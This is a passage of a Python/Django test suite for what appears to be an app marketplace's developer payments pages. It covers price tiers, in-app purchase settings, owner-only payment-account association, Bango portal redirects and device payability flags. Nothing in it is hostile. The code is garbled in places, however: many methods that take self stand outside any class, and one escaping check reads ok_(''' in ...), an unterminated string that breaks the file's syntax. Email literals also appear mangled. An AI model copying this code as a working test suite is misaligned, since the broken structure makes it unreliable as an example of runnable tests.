        'data-tier-zero-id')), price_tier_zero.pk)

def test_not_applicable_data_attr_in_content(self):
    # The "not applicable" message data attribute is rendered.
    self.webapp.update(premium_type=amo.ADDON_PREMIUM)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#region-list[data-not-applicable-msg]')), 1)

def test_pay_method_ids_in_context(self):
    # All three payment-method constants are passed to the template.
    self.webapp.update(premium_type=amo.ADDON_PREMIUM)
    res = self.client.get(self.url)
    self.assertSetEqual(res.context['payment_methods'].keys(),
                        [PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
                         PAYMENT_METHOD_OPERATOR])

def test_free_with_in_app_deletes_upsell(self):
    # Switching to free-with-inapp removes any upsell relationship
    # and the AddonPremium row.
    self.make_premium(self.webapp)
    new_upsell_app = Addon.objects.create(
        type=self.webapp.type,
        status=self.webapp.status,
        name='upsell-%s' % self.webapp.id,
        premium_type=amo.ADDON_FREE)
    new_upsell = AddonUpsell(premium=self.webapp)
    new_upsell.free = new_upsell_app
    new_upsell.save()
    assert self.get_webapp().upsold is not None
    self.client.post(self.url,
                     self.get_postdata({'price': 'free',
                                        'allow_inapp': 'True',
                                        'regions': ALL_REGION_IDS}),
                     follow=True)
    eq_(self.get_webapp().upsold, None)
    eq_(AddonPremium.objects.all().count(), 0)

def test_premium_in_app_passes(self):
    # Toggle to paid, then enable in-app: ends as ADDON_PREMIUM_INAPP.
    self.webapp.update(premium_type=amo.ADDON_FREE)
    res = self.client.post(
        self.url, self.get_postdata({'toggle-paid': 'paid'}))
    self.assert3xx(res, self.url)
    res = self.client.post(
        self.url, self.get_postdata({'allow_inapp': True,
                                     'price': self.price.pk,
                                     'regions': ALL_REGION_IDS}))
    self.assert3xx(res, self.url)
    eq_(self.get_webapp().premium_type, amo.ADDON_PREMIUM_INAPP)
# --- Price-tier selection and incomplete-status tests. ---

@mock.patch('mkt.webapps.models.Webapp.is_fully_complete')
def test_later_then_free(self, complete_mock):
    # Going back to free from a pending premium app restores the
    # highest_status and drops the AddonPremium row.
    complete_mock.return_value = True
    self.webapp.update(premium_type=amo.ADDON_PREMIUM,
                       status=amo.STATUS_NULL,
                       highest_status=amo.STATUS_PENDING)
    self.make_premium(self.webapp)
    res = self.client.post(
        self.url, self.get_postdata({'toggle-paid': 'free',
                                     'price': self.price.pk}))
    self.assert3xx(res, self.url)
    eq_(self.get_webapp().status, amo.STATUS_PENDING)
    eq_(AddonPremium.objects.all().count(), 0)

def test_premium_price_initial_already_set(self):
    # The price select is pre-selected with the app's existing tier.
    self.make_premium(self.webapp)
    r = self.client.get(self.url)
    eq_(pq(r.content)('select[name=price] option[selected]').attr('value'),
        str(self.webapp.premium.price.id))

def test_premium_price_initial_use_default(self):
    # With no tier chosen yet, the $0.99 tier is the default selection.
    Price.objects.create(price='10.00')  # Make one more tier.
    self.webapp.update(premium_type=amo.ADDON_FREE)
    res = self.client.post(
        self.url, self.get_postdata({'toggle-paid': 'paid'}), follow=True)
    pqr = pq(res.content)
    eq_(pqr('select[name=price] option[selected]').attr('value'),
        str(Price.objects.get(price='0.99').id))

def test_starting_with_free_inapp_has_free_selected(self):
    # Free-with-inapp apps show 'free' selected in the price dropdown.
    self.webapp.update(premium_type=amo.ADDON_FREE_INAPP)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(pqr('select[name=price] option[selected]').attr('value'), 'free')

def test_made_free_inapp_has_free_selected(self):
    # Posting price=free with in-app keeps 'free' selected after save.
    self.make_premium(self.webapp)
    res = self.client.post(
        self.url, self.get_postdata({'price': 'free',
                                     'allow_inapp': 'True'}), follow=True)
    pqr = pq(res.content)
    eq_(pqr('select[name=price] option[selected]').attr('value'), 'free')

def test_made_free_inapp_then_free(self):
    # Premium -> free+inapp -> fully free transitions update premium_type.
    self.webapp.update(premium_type=amo.ADDON_PREMIUM)
    self.make_premium(self.webapp)
    self.client.post(
        self.url, self.get_postdata({'price': 'free',
                                     'allow_inapp': 'True',
                                     'regions': ALL_REGION_IDS}))
    eq_(self.get_webapp().premium_type, amo.ADDON_FREE_INAPP)
    self.client.post(
        self.url, self.get_postdata({'toggle-paid': 'free',
                                     'regions': ALL_REGION_IDS}))
    eq_(self.get_webapp().premium_type, amo.ADDON_FREE)

def test_free_with_inapp_without_account_has_incomplete_status(self):
    # Without a payment account the app stays STATUS_NULL and the
    # "incomplete" island is visible.
    self.webapp.update(premium_type=amo.ADDON_FREE)
    # Toggle to paid.
    self.client.post(
        self.url, self.get_postdata({'toggle-paid': 'paid'}))
    res = self.client.post(
        self.url, self.get_postdata({'price': 'free',
                                     'allow_inapp': 'True',
                                     'regions': ALL_REGION_IDS}))
    self.assert3xx(res, self.url)
    eq_(self.get_webapp().status, amo.STATUS_NULL)
    eq_(AddonPremium.objects.all().count(), 0)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#paid-island-incomplete:not(.hidden)')), 1)

def test_paid_app_without_account_has_incomplete_status(self):
    # Same as above for a priced (non-inapp) app.
    self.webapp.update(premium_type=amo.ADDON_FREE)
    # Toggle to paid.
    self.client.post(
        self.url, self.get_postdata({'toggle-paid': 'paid'}))
    res = self.client.post(
        self.url, self.get_postdata({'price': self.price.pk,
                                     'allow_inapp': 'False',
                                     'regions': ALL_REGION_IDS}))
    self.assert3xx(res, self.url)
    eq_(self.get_webapp().status, amo.STATUS_NULL)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#paid-island-incomplete:not(.hidden)')), 1)
def setup_payment_acct(self, make_owner, user=None, bango_id=123):
    """Create a PaymentAccount (plus SolitudeSeller) for ``user``.

    Mocks the Solitude generic and Bango product endpoints so nothing
    hits the network. When ``make_owner`` is true, ``user`` is also
    given the OWNER role on ``self.webapp``. Returns ``(account, user)``.

    Fix: the ``bango_id`` parameter was previously ignored — the mocked
    Bango response hard-coded ``123``. It now honours the argument
    (the default keeps the old behavior).
    """
    # Set up Solitude return values.
    gen = self.generic_patcher
    prov = self.bango_patcher
    gen.product.get_object.side_effect = ObjectDoesNotExist
    gen.product.post.return_value = {'resource_uri': 'gpuri'}
    prov.product.get_object.side_effect = ObjectDoesNotExist
    prov.product.post.return_value = {
        'resource_uri': 'bpruri', 'bango_id': bango_id}
    if not user:
        user = self.user
    amo.set_user(user)
    if make_owner:
        # Make owner.
        AddonUser.objects.create(addon=self.webapp,
                                 user=user, role=amo.AUTHOR_ROLE_OWNER)
    # Set up an existing bank account.
    seller = SolitudeSeller.objects.create(
        resource_uri='/path/to/sel', user=user, uuid='uuid-%s' % user.pk)
    acct = PaymentAccount.objects.create(
        user=user, uri='asdf-%s' % user.pk, name='test', inactive=False,
        seller_uri='suri-%s' % user.pk, solitude_seller=seller,
        account_id=123, agreed_tos=True)
    return acct, user
def is_owner(self, user):
    """Return True when ``user`` holds the OWNER role on this webapp."""
    owners = self.webapp.authors.filter(
        pk=user.pk, addonuser__role=amo.AUTHOR_ROLE_OWNER)
    return owners.exists()
# --- Associating a payment account with the app (owner path). ---

def test_associate_acct_to_app_free_inapp(self):
    # An owner can attach an account to a free-with-inapp app; no
    # AddonPremium row is created and the incomplete island hides.
    acct, user = self.setup_payment_acct(make_owner=True)
    # Must be an app owner to change this.
    assert self.is_owner(user)
    # Associate account with app.
    self.make_premium(self.webapp)
    res = self.client.post(
        self.url, self.get_postdata({'price': 'free',
                                     'allow_inapp': 'True',
                                     'regions': ALL_REGION_IDS,
                                     'accounts': acct.pk}), follow=True)
    self.assertNoFormErrors(res)
    eq_(res.status_code, 200)
    eq_(self.webapp.payment_account(PROVIDER_BANGO).payment_account.pk,
        acct.pk)
    eq_(AddonPremium.objects.all().count(), 0)
    eq_(len(pq(res.content)('#paid-island-incomplete.hidden')), 1)

def test_associate_acct_to_app(self):
    # Attaching an account to a priced app creates the Solitude product
    # with purchase access and a Bango secret.
    self.make_premium(self.webapp, price=self.price.price)
    acct, user = self.setup_payment_acct(make_owner=True)
    # Must be an app owner to change this.
    assert self.is_owner(user)
    # Associate account with app.
    for k in [self.generic_patcher.product.get_object_or_404,
              self.bango_patcher.product.get_object_or_404]:
        k.side_effect = ObjectDoesNotExist
    res = self.client.post(
        self.url, self.get_postdata({'price': self.price.pk,
                                     'accounts': acct.pk,
                                     'regions': ALL_REGION_IDS}),
        follow=True)
    self.assertNoFormErrors(res)
    eq_(res.status_code, 200)
    eq_(len(pq(res.content)('#paid-island-incomplete.hidden')), 1)
    eq_(self.webapp.payment_account(PROVIDER_BANGO).payment_account.pk,
        acct.pk)
    kw = self.generic_patcher.product.post.call_args[1]['data']
    eq_(kw['access'], ACCESS_PURCHASE)
    kw = self.bango_p_patcher.product.post.call_args[1]['data']
    ok_(kw['secret'], kw)
# --- Region lists are sorted per the request locale. ---

def test_acct_region_sorting_by_locale(self):
    self.make_premium(self.webapp, price=self.price.price)
    res = self.client.get(self.url + '?lang=en')
    regions = res.context['provider_regions'][PROVIDER_BANGO]
    eq_(regions, [SPAIN, UK, US])
    # Form choices sort in English.
    form_choices = [r[1] for r in
                    res.context['region_form']['regions'].field.choices]
    # For EN, Spain comes before United Kingdom.
    ok_(form_choices.index(SPAIN.name) < form_choices.index(UK.name))
    # and United Kingdom comes before United States.
    ok_(form_choices.index(UK.name) < form_choices.index(US.name))

def test_acct_region_sorting_by_locale_fr(self):
    self.make_premium(self.webapp, price=self.price.price)
    res = self.client.get(self.url + '?lang=fr')
    regions = res.context['provider_regions'][PROVIDER_BANGO]
    # En français: Espagne, États-Unis, Royaume-Uni
    # Without unicode normalization this would be:
    # Espagne, Royaume-Uni, États-Unis
    eq_(regions, [SPAIN, US, UK])
    # Check we're also doing a normalized sort of the form choices.
    form_choices = [r[1] for r in
                    res.context['region_form']['regions'].field.choices]
    # For FR, Espagne comes before États-Unis.
    ok_(form_choices.index(SPAIN.name) < form_choices.index(US.name))
    # and États-Unis comes before Royaume-Uni.
    ok_(form_choices.index(US.name) < form_choices.index(UK.name))
# --- Associating accounts as a non-owner / admin is refused. ---

def test_associate_acct_to_app_when_not_owner(self):
    # Non-owners get a 403 and no AddonPaymentAccount is created.
    self.make_premium(self.webapp, price=self.price.price)
    self.login(self.other)
    acct, user = self.setup_payment_acct(make_owner=False, user=self.other)
    # Check we're not an owner before we start.
    assert not self.is_owner(user)
    # Attempt to associate account with app as non-owner.
    res = self.client.post(
        self.url, self.get_postdata({'accounts': acct.pk}), follow=True)
    # Non-owner posts are forbidden.
    eq_(res.status_code, 403)
    # Payment account shouldn't be set as we're not the owner.
    assert not (AddonPaymentAccount.objects
                .filter(addon=self.webapp).exists())

def test_associate_acct_to_app_when_not_owner_and_an_admin(self):
    # Admins who aren't owners can view the page but the account
    # field is disabled and nothing gets associated.
    self.make_premium(self.webapp, self.price.price)
    self.login(self.admin)
    acct, user = self.setup_payment_acct(make_owner=False, user=self.admin)
    # Check we're not an owner before we start.
    assert not self.is_owner(user)
    assert not (AddonPaymentAccount.objects
                .filter(addon=self.webapp).exists())
    # Attempt to associate account with app as non-owner admin.
    res = self.client.post(self.url,
                           self.get_postdata({'accounts': acct.pk,
                                              'price': self.price.pk,
                                              'regions': ALL_REGION_IDS}),
                           follow=True)
    self.assertFalse(AddonPaymentAccount.objects
                     .filter(addon=self.webapp)
                     .exists(),
                     'account was associated')
    pqr = pq(res.content)
    # Payment field should be disabled.
    eq_(len(pqr('#id_form-0-accounts[disabled]')), 1)
    # There's no existing associated account.
    eq_(len(pqr('.current-account')), 0)

def test_associate_acct_to_app_when_admin_and_owner_acct_exists(self):
    # An admin's post cannot replace an account the owner already set.
    def current_account():
        return self.webapp.payment_account(PROVIDER_BANGO).payment_account
    self.make_premium(self.webapp, price=self.price.price)
    owner_acct, owner_user = self.setup_payment_acct(make_owner=True)
    assert self.is_owner(owner_user)
    self.client.post(self.url,
                     self.get_postdata({'accounts': owner_acct.pk,
                                        'price': self.price.pk,
                                        'regions': ALL_REGION_IDS}),
                     follow=True)
    assert (AddonPaymentAccount.objects
            .filter(addon=self.webapp).exists())
    self.login(self.admin)
    admin_acct, admin_user = self.setup_payment_acct(make_owner=False,
                                                     user=self.admin)
    # Check we're not an owner before we start.
    assert not self.is_owner(admin_user)
    assert current_account().pk == owner_acct.pk
    self.client.post(self.url,
                     self.get_postdata({'accounts': admin_acct.pk,
                                        'price': self.price.pk,
                                        'regions': ALL_REGION_IDS}),
                     follow=True)
    # The owner's account must still be the one in effect.
    assert current_account().pk == owner_acct.pk
# --- Multiple owners / non-owners see the account widget correctly. ---

def test_one_owner_and_a_second_one_sees_selected_plus_own_accounts(self):
    # A second owner sees the saved account (read-only) plus their own
    # account in the select, and may save their own.
    self.make_premium(self.webapp, price=self.price.price)
    owner_acct, owner = self.setup_payment_acct(make_owner=True)
    # Should be an owner.
    assert self.is_owner(owner)
    res = self.client.post(
        self.url, self.get_postdata({'accounts': owner_acct.pk,
                                     'price': self.price.pk,
                                     'regions': ALL_REGION_IDS}),
        follow=True)
    assert (AddonPaymentAccount.objects
            .filter(addon=self.webapp).exists())
    # Login as other user.
    self.login(self.other)
    owner_acct2, owner2 = self.setup_payment_acct(make_owner=True,
                                                  user=self.other)
    assert self.is_owner(owner2)
    # Should see the saved account plus 2nd owner's own account select
    # and be able to save their own account but not the other owners.
    res = self.client.get(self.url)
    eq_(res.status_code, 200)
    pqr = pq(res.content)
    # Check we have just our account option present + '----'.
    eq_(len(pqr('#id_form-0-accounts option')), 2)
    eq_(len(pqr('#id_account[disabled]')), 0)
    eq_(pqr('.current-account').text(), unicode(owner_acct))
    res = self.client.post(
        self.url, self.get_postdata({'accounts': owner_acct2.pk,
                                     'price': self.price.pk,
                                     'regions': ALL_REGION_IDS}),
        follow=True)
    eq_(res.status_code, 200)
    self.assertNoFormErrors(res)
    pqr = pq(res.content)
    eq_(len(pqr('.current-account')), 0)
    eq_(pqr('#id_form-0-accounts option[selected]').text(),
        unicode(owner_acct2))
    # Now there should just be our account.
    eq_(len(pqr('#id_form-0-accounts option')), 1)

def test_existing_account_should_be_disabled_for_non_owner(self):
    # Developers (non-owners) see the current account read-only.
    self.make_premium(self.webapp, price=self.price.price)
    acct, user = self.setup_payment_acct(make_owner=True)
    # Must be an app owner to change this.
    assert self.is_owner(user)
    # Associate account with app.
    res = self.client.post(
        self.url, self.get_postdata({'accounts': acct.pk,
                                     'price': self.price.pk,
                                     'regions': ALL_REGION_IDS}),
        follow=True)
    amo.set_user(self.other)
    # Make this user a dev so they have access to the payments page.
    AddonUser.objects.create(addon=self.webapp,
                             user=self.other, role=amo.AUTHOR_ROLE_DEV)
    self.login(self.other)
    # Make sure not an owner.
    assert not self.is_owner(self.other)
    res = self.client.get(self.url)
    eq_(res.status_code, 200)
    pqr = pq(res.content)
    # No accounts setup.
    eq_(len(pqr('.no-accounts')), 1)
    # Currently associated account should be displayed separately.
    eq_(pqr('.current-account').text(), unicode(acct))
def test_existing_account_should_be_disabled_for_non_owner_admin(self):
    # Admins who are not owners also get a disabled account field.
    self.make_premium(self.webapp, price=self.price.price)
    # Login as regular user.
    self.login(self.other)
    owner_acct, user = self.setup_payment_acct(make_owner=True,
                                               user=self.other)
    # Must be an app owner to change this.
    assert self.is_owner(self.other)
    # Associate account with app.
    res = self.client.post(self.url,
                           self.get_postdata({'accounts': owner_acct.pk,
                                              'price': self.price.pk,
                                              'regions': ALL_REGION_IDS}),
                           follow=True)
    self.assertNoFormErrors(res)
    # Login as admin.
    self.login(self.admin)
    # Create an account as an admin.
    admin_acct, admin_user = self.setup_payment_acct(make_owner=False,
                                                     user=self.admin)
    # Make sure not an owner.
    assert not self.is_owner(self.admin)
    res = self.client.get(self.url)
    eq_(res.status_code, 200)
    pqr = pq(res.content)
    # Payment field should be disabled.
    eq_(len(pqr('#id_form-0-accounts[disabled]')), 1)
    # Currently associated account should be displayed separately.
    eq_(pqr('.current-account').text(), unicode(owner_acct))

def test_deleted_payment_accounts_switch_to_incomplete_apps(self):
    # Deleting the payment account knocks the app back to STATUS_NULL.
    self.make_premium(self.webapp, price=self.price.price)
    self.login(self.user)
    addon_account = setup_payment_account(self.webapp, self.user)
    eq_(self.webapp.status, amo.STATUS_PUBLIC)
    self.client.post(reverse(
        'mkt.developers.provider.delete_payment_account',
        args=[addon_account.payment_account.pk]))
    eq_(self.webapp.reload().status, amo.STATUS_NULL)

def test_addon_payment_accounts_with_or_without_addons(self):
    # The accounts JSON lists associated app names; empty after delete.
    self.make_premium(self.webapp, price=self.price.price)
    self.login(self.user)
    addon_account = setup_payment_account(self.webapp, self.user)
    payment_accounts = reverse('mkt.developers.provider.payment_accounts')
    res = self.client.get(payment_accounts)
    eq_(json.loads(res.content)[0]['app-names'],
        u'Something Something Steamcube!')
    for apa in addon_account.payment_account.addonpaymentaccount_set.all():
        apa.addon.delete()
    res = self.client.get(payment_accounts)
    eq_(json.loads(res.content)[0]['app-names'], u'')

def setup_bango_portal(self):
    # Shared fixture: premium app owned by user 31337 with a Bango
    # account, plus the portal URL under test.
    self.user = UserProfile.objects.get(pk=31337)
    self.webapp.update(premium_type=amo.ADDON_PREMIUM)
    self.login(self.user)
    self.account = setup_payment_account(self.webapp, self.user)
    self.portal_url = self.webapp.get_dev_url(
        'payments.bango_portal_from_addon')
# --- Provider templates and Bango portal access control. ---

def test_template_switches(self):
    # Each configured provider renders its own add-account template.
    payments_url = self.webapp.get_dev_url('payments')
    providers = ['reference', 'boku', 'bango']
    for provider in providers:
        with self.settings(PAYMENT_PROVIDERS=[provider],
                           DEFAULT_PAYMENT_PROVIDER=provider):
            res = self.client.get(payments_url)
            tmpl_id = '#{p}-payment-account-add-template'.format(p=provider)
            tmpl = self.extract_script_template(res.content, tmpl_id)
            eq_(len(tmpl('.payment-account-{p}'.format(p=provider))), 1)

def test_bango_portal_links(self):
    # The account-row template contains a portal link.
    payments_url = self.webapp.get_dev_url('payments')
    res = self.client.get(payments_url)
    account_template = self.extract_script_template(
        res.content, '#account-row-template')
    eq_(len(account_template('.portal-account')), 1)

@mock.patch('mkt.developers.views_payments.client.api')
def test_bango_portal_redirect(self, api):
    # Owners get a 204 whose Location carries the Bango auth token.
    self.setup_bango_portal()
    authentication_token = u'D0A44686-D4A3-4B2F-9BEB-5E4975E35192'
    api.bango.login.post.return_value = {
        'person_id': 600925,
        'email_address': u'[email protected]',
        'authentication_token': authentication_token,
    }
    assert self.is_owner(self.user)
    res = self.client.get(self.portal_url)
    eq_(res.status_code, 204)
    eq_(api.bango.login.post.call_args[0][0]['packageId'],
        int(TEST_PACKAGE_ID))
    redirect_url = res['Location']
    assert authentication_token in redirect_url, redirect_url
    assert 'emailAddress=admin%40place.com' in redirect_url, redirect_url

@mock.patch('mkt.developers.views_payments.client.api')
def test_bango_portal_redirect_api_error(self, api):
    # Solitude errors surface as a 400 with the error payload.
    self.setup_bango_portal()
    err = {'errors': 'Something went wrong.'}
    api.bango.login.post.side_effect = HttpClientError(content=err)
    res = self.client.get(self.portal_url)
    eq_(res.status_code, 400)
    eq_(json.loads(res.content), err)

def test_not_bango(self):
    # The portal is Bango-only; other providers get a 403.
    self.setup_bango_portal()
    self.account.payment_account.provider = PROVIDER_REFERENCE
    self.account.payment_account.save()
    res = self.client.get(self.portal_url)
    eq_(res.status_code, 403)

def test_bango_portal_redirect_role_error(self):
    # Checks that only the owner can access the page (vs. developers).
    self.setup_bango_portal()
    addon_user = self.user.addonuser_set.all()[0]
    addon_user.role = amo.AUTHOR_ROLE_DEV
    addon_user.save()
    assert not self.is_owner(self.user)
    res = self.client.get(self.portal_url)
    eq_(res.status_code, 403)

def test_bango_portal_redirect_permission_error(self):
    # Checks that the owner of another app can't access the page.
    self.setup_bango_portal()
    self.login(self.other)
    other_webapp = Addon.objects.create(type=self.webapp.type,
                                        status=self.webapp.status,
                                        name='other-%s' % self.webapp.id,
                                        premium_type=amo.ADDON_PREMIUM)
    AddonUser.objects.create(addon=other_webapp,
                             user=self.other, role=amo.AUTHOR_ROLE_OWNER)
    res = self.client.get(self.portal_url)
    eq_(res.status_code, 403)

def test_bango_portal_redirect_solitude_seller_error(self):
    # Checks that the owner has a SolitudeSeller instance for this app.
    self.setup_bango_portal()
    assert self.is_owner(self.user)
    for acct in self.webapp.app_payment_accounts.all():
        acct.payment_account.solitude_seller.update(user=self.other)
    res = self.client.get(self.portal_url)
    eq_(res.status_code, 403)
# --- Device-type checkboxes and `cannot_be_paid` flag behavior,
#     gated on the android-payments / *-packaged waffle flags. ---

def test_device_checkboxes_present_with_android_payments(self):
    self.create_flag('android-payments')
    self.webapp.update(premium_type=amo.ADDON_PREMIUM)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#paid-android-mobile input[type="checkbox"]')), 1)
    eq_(len(pqr('#paid-android-tablet input[type="checkbox"]')), 1)

def test_device_checkboxes_not_present_without_android_payments(self):
    self.webapp.update(premium_type=amo.ADDON_PREMIUM)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#paid-android-mobile input[type="checkbox"]')), 0)
    eq_(len(pqr('#paid-android-tablet input[type="checkbox"]')), 0)

def test_cannot_be_paid_with_android_payments_just_ffos(self):
    # Firefox OS-only apps can always be paid.
    self.create_flag('android-payments')
    self.webapp.addondevicetype_set.get_or_create(
        device_type=amo.DEVICE_GAIA.id)
    res = self.client.get(self.url)
    eq_(res.status_code, 200)
    eq_(res.context['cannot_be_paid'], False)

def test_cannot_be_paid_without_android_payments_just_ffos(self):
    # With no Gaia device type left, the app cannot be paid.
    self.webapp.addondevicetype_set.filter(
        device_type=amo.DEVICE_GAIA.id).delete()
    res = self.client.get(self.url)
    eq_(res.status_code, 200)
    eq_(res.context['cannot_be_paid'], True)

def test_cannot_be_paid_with_android_payments(self):
    # Android devices are payable only when the flag is on.
    self.create_flag('android-payments')
    for device_type in (amo.DEVICE_GAIA,
                        amo.DEVICE_MOBILE, amo.DEVICE_TABLET):
        self.webapp.addondevicetype_set.get_or_create(
            device_type=device_type.id)
    res = self.client.get(self.url)
    eq_(res.status_code, 200)
    eq_(res.context['cannot_be_paid'], False)

def test_cannot_be_paid_without_android_payments(self):
    for device_type in (amo.DEVICE_GAIA,
                        amo.DEVICE_MOBILE, amo.DEVICE_TABLET):
        self.webapp.addondevicetype_set.get_or_create(
            device_type=device_type.id)
    res = self.client.get(self.url)
    eq_(res.status_code, 200)
    eq_(res.context['cannot_be_paid'], True)

def test_cannot_be_paid_pkg_with_desktop_pkg(self):
    # Packaged desktop apps are never payable.
    self.create_flag('desktop-packaged')
    self.webapp.update(is_packaged=True)
    for device_type in (amo.DEVICE_GAIA,
                        amo.DEVICE_DESKTOP):
        self.webapp.addondevicetype_set.get_or_create(
            device_type=device_type.id)
    res = self.client.get(self.url)
    eq_(res.status_code, 200)
    eq_(res.context['cannot_be_paid'], True)

def test_cannot_be_paid_pkg_without_desktop_pkg(self):
    self.webapp.update(is_packaged=True)
    self.webapp.addondevicetype_set.get_or_create(
        device_type=amo.DEVICE_GAIA.id)
    res = self.client.get(self.url)
    eq_(res.status_code, 200)
    eq_(res.context['cannot_be_paid'], False)

def test_cannot_be_paid_pkg_with_android_pkg_no_android_payments(self):
    self.create_flag('android-packaged')
    self.webapp.update(is_packaged=True)
    for device_type in (amo.DEVICE_GAIA,
                        amo.DEVICE_MOBILE, amo.DEVICE_TABLET):
        self.webapp.addondevicetype_set.get_or_create(
            device_type=device_type.id)
    res = self.client.get(self.url)
    eq_(res.status_code, 200)
    eq_(res.context['cannot_be_paid'], True)

def test_cannot_be_paid_pkg_with_android_pkg_w_android_payments(self):
    self.create_flag('android-packaged')
    self.create_flag('android-payments')
    self.webapp.update(is_packaged=True)
    for device_type in (amo.DEVICE_GAIA,
                        amo.DEVICE_MOBILE, amo.DEVICE_TABLET):
        self.webapp.addondevicetype_set.get_or_create(
            device_type=device_type.id)
    res = self.client.get(self.url)
    eq_(res.status_code, 200)
    eq_(res.context['cannot_be_paid'], False)

def test_no_desktop_if_no_packaged_desktop_flag(self):
    self.webapp.update(is_packaged=True)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#free-desktop')), 0)

def test_no_android_if_no_packaged_android_flag(self):
    self.webapp.update(is_packaged=True)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#free-android-mobile')), 0)
    eq_(len(pqr('#free-android-tablet')), 0)

def test_desktop_if_packaged_desktop_flag_is_set(self):
    self.create_flag('desktop-packaged')
    self.webapp.update(is_packaged=True)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#free-desktop')), 1)

def test_android_if_packaged_android_flag_is_set(self):
    self.create_flag('android-packaged')
    self.webapp.update(is_packaged=True)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#free-android-mobile')), 1)
    eq_(len(pqr('#free-android-tablet')), 1)
class TestRegions(amo.tests.TestCase):
    """Region-exclusion behavior of the payments page."""
    fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')

    def setUp(self):
        self.webapp = self.get_webapp()
        AddonDeviceType.objects.create(
            addon=self.webapp, device_type=amo.DEVICE_GAIA.id)
        self.url = self.webapp.get_dev_url('payments')
        self.username = '[email protected]'
        assert self.client.login(username=self.username, password='password')
        # Mock out the Solitude client used by developer models.
        self.patch = mock.patch('mkt.developers.models.client')
        self.sol = self.patch.start()

    def tearDown(self):
        self.patch.stop()

    def get_webapp(self):
        return Addon.objects.get(pk=337141)

    def get_dict(self, **kwargs):
        # Default POST payload: every region plus the app's platforms.
        extension = {'regions': mkt.regions.ALL_REGION_IDS,
                     'other_regions': 'on',
                     'free_platforms': ['free-%s' % dt.class_name for dt in
                                        self.webapp.device_types]}
        extension.update(kwargs)
        return extension

    def get_excluded_ids(self):
        # Sorted region ids currently excluded for this app.
        return sorted(AER.objects.filter(addon=self.webapp)
                                 .values_list('region', flat=True))

    def test_edit_all_regions_are_not_excluded(self):
        # Keep the category around for good measure.
        Category.objects.create(type=amo.ADDON_WEBAPP, slug='games')
        r = self.client.post(self.url, self.get_dict())
        self.assertNoFormErrors(r)
        eq_(AER.objects.count(), 0)
class PaymentsBase(amo.tests.TestCase):
    """Base fixture: a logged-in user (pk=999) with one PaymentAccount."""
    fixtures = fixture('user_editor', 'user_999')

    def setUp(self):
        self.user = UserProfile.objects.get(pk=999)
        self.login(self.user)
        self.account = self.create()

    def create(self):
        # If user is defined on SolitudeSeller, why do we also need it on
        # PaymentAccount? Fewer JOINs.
        seller = SolitudeSeller.objects.create(user=self.user)
        # The apostrophe in the name is deliberate: tests check it is
        # jinja2-escaped in JSON output.
        return PaymentAccount.objects.create(user=self.user,
                                             solitude_seller=seller,
                                             uri='/bango/package/123',
                                             name="cvan's cnotes",
                                             agreed_tos=True)
class TestPaymentAccountsAdd(Patcher, PaymentsBase):
    """POSTing the add-payment-account endpoint."""
    # TODO: this test provides bare coverage and might need to be expanded.

    def setUp(self):
        super(TestPaymentAccountsAdd, self).setUp()
        self.url = reverse('mkt.developers.provider.add_payment_account')

    def test_login_required(self):
        self.client.logout()
        self.assertLoginRequired(self.client.post(self.url, data={}))

    def test_create(self):
        # A full Bango registration form creates a second account and
        # returns its pk plus the agreement URL.
        res = self.client.post(self.url, data={
            'bankAccountPayeeName': 'name',
            'companyName': 'company',
            'vendorName': 'vendor',
            'financeEmailAddress': '[email protected]',
            'adminEmailAddress': '[email protected]',
            'supportEmailAddress': '[email protected]',
            'address1': 'address 1',
            'addressCity': 'city',
            'addressState': 'state',
            'addressZipCode': 'zip',
            'addressPhone': '123',
            'countryIso': 'BRA',
            'currencyIso': 'EUR',
            'bankAccountNumber': '123',
            'bankAccountCode': '123',
            'bankName': 'asd',
            'bankAddress1': 'address 2',
            'bankAddressZipCode': '123',
            'bankAddressIso': 'BRA',
            'account_name': 'account',
            'provider': 'bango',
        })
        eq_(res.status_code, 200)
        output = json.loads(res.content)
        ok_('pk' in output)
        ok_('agreement-url' in output)
        eq_(PaymentAccount.objects.count(), 2)
class TestPaymentAccounts(PaymentsBase):
    """Listing the current user's payment accounts as JSON."""

    def setUp(self):
        super(TestPaymentAccounts, self).setUp()
        self.url = reverse('mkt.developers.provider.payment_accounts')

    def test_login_required(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))

    def test_mine(self):
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        output = json.loads(res.content)
        eq_(output[0]['id'], self.account.pk)
        ok_(''' in output[0]['name'])  # Was jinja2 escaped.
class TestPaymentPortal(PaymentsBase):
    """Per-provider portal URLs in the accounts JSON."""
    fixtures = PaymentsBase.fixtures + fixture('webapp_337141')

    def setUp(self):
        super(TestPaymentPortal, self).setUp()
        self.app_slug = 'something-something'
        self.url = reverse('mkt.developers.provider.payment_accounts')
        self.bango_url = reverse(
            'mkt.developers.apps.payments.bango_portal_from_addon',
            args=[self.app_slug])

    def test_with_app_slug(self):
        # With an app-slug param, the Bango portal URL is included.
        res = self.client.get(self.url, {'app-slug': self.app_slug})
        eq_(res.status_code, 200)
        output = json.loads(res.content)
        eq_(output[0]['portal-url'], self.bango_url)

    def test_without_app_slug(self):
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        output = json.loads(res.content)
        eq_(output[0]['portal-url'], '')

    def test_reference(self):
        # The reference provider has no portal: 403.
        amo.tests.app_factory(app_slug=self.app_slug)
        PaymentAccount.objects.update(provider=PROVIDER_REFERENCE)
        res = self.client.get(self.bango_url)
        eq_(res.status_code, 403)

    def test_boku(self):
        # Boku accounts use the settings-configured portal URL.
        PaymentAccount.objects.update(provider=PROVIDER_BOKU)
        with self.settings(PAYMENT_PROVIDERS=['boku']):
            res = self.client.get(self.url)
        eq_(res.status_code, 200)
        output = json.loads(res.content)
